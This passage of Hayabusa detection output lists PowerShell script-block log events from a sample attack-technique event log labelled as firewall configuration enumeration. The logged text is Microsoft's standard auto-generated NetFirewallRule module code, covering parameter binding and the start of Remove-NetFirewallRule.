'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { 
[object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletizat,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ion_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { 
[object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', 
$__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } 